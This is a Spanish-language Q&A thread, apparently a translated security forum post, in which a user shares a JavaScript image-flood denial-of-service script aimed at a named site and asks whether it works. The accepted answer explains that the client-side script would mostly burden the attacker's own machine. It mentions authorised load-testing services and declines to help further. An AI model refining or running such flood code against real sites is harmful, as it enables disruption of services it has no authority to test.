¿Cómo puedo saber si un ataque de denegación de servicio está funcionando? ¿Funcionaría este ataque? [cerrado]

Question

¿Cómo puedo saber si un ataque de denegación de servicio está funcionando? ¿Funcionaría este ataque? [cerrado]

#1 de ISMSDEV (2 votos)

-4

Diga que quiero probar la seguridad de un sitio y decido enviar un ataque DOS contra él usando un script javascript:

 function imgflood(link, uri) {  
   var TARGET = link;
   var URI = uri;
   var pic = new Image();
   var rand = Math.floor(Math.random() * 10000000);
   pic.src = 'http:'+TARGET+URI+rand+'=val';
 }
 function DOSATTACK(link){
 var domain = link;
 setInterval(function(){
   var i = 0;
   var img = document.createElement('img');
   img.setAttribute('src', 'ftp://' + domain + ':80/image' + new 
 Date().getTime() + i );
   document.body.appendChild(img);
 }, 1);  
 }

 setInterval(function(){
   imgflood("ASite.com","/index.html");
   DOSATTACK("ASite.com");

}, 500);

Tengo 2 preguntas: Primero, ¿cómo podría saber si estoy haciendo algún daño, aparte de solo el retraso del sitio (porque ese podría ser el retraso de mi computadora porque estoy creando una tonelada de imágenes para el sitio)?

Dos, ¿esta secuencia de comandos funcionaría o solo usaría mi ancho de banda hasta que mi computadora fallara? He notado que mi computadora puede demorarse un poco, pero puedo cerrar la pestaña y acceder a otro sitio fácilmente.

denial-of-service ddos javascript

pregunta The Gamer King 26.05.2017 - 03:25

fuente

1 respuesta

Lea otras preguntas en las etiquetas denial-of-service ddos javascript

¿Cómo puedo explotar una inyección SQL basada en el tiempo sin usar comillas simples? ¿Por qué no se compila el código fuente de ASP.NET antes de publicarlo?

score 2 · Accepted Answer

Para responder a las dos preguntas juntos. No, no lo harían, simplemente no es probable que su computadora tenga la cantidad de ancho de banda de egreso necesario e incluso si lo hiciera, la computadora sería el cuello de botella ejecutando el código del lado del cliente y no causaría ningún impacto en el servidor.

Has preguntado

"¿Cómo podría saber si estoy haciendo algún daño, aparte de solo el sitio retrasado (porque eso podría ser mi computadora retrasada porque Estoy haciendo un montón de imágenes para el sitio) ".

Puede saber si está funcionando revisando el sitio desde otra red. Si, por ejemplo, su teléfono que utiliza la red de proveedores móviles, no su wifi, muestra que el sitio se está ralentizando, puede estar teniendo un impacto. - Esto también es improbable

¿Funcionaría esta secuencia de comandos o solo usaría mi ancho de banda? hasta que mi computadora falló He notado que mi computadora puede demorarse un poco pero puedo cerrar la pestaña y acceder a otro sitio fácilmente.

Es poco probable que el script funcione, el código es del lado del cliente y solo es probable que afecte a su máquina local.

Tampoco estoy seguro de por qué intentaría hacerlo a través del navegador y / o JavaScript. Nuevamente, el código es del lado del cliente y la memoria de las computadoras locales y la CPU se llevarán la peor parte de la ejecución del código. Puede que sea mejor que busque métodos alternativos, ya que este enfoque parece producir poco o ningún resultado en comparación con los gastos generales.

Si estaba realizando pruebas de penetración reales, entonces se utilizan mejor los gustos de enlace . Permiten que las pruebas de carga remota se realicen apuntando clientes virtuales a un servidor web. Luego pueden replicar usuarios en el sistema, dado que hay suficientes usuarios virtuales que podrían causar que un sitio se bloquee. Estos sitios son solo para probar sus propios sitios o para los sitios que tiene autoridad legal para probar.

Finalmente, no estoy seguro de que este sea el lugar para obtener un código de ataque específico, ya que claramente le has dado el dominio en tu código. Sugeriría que este foro no es el que necesitas usar.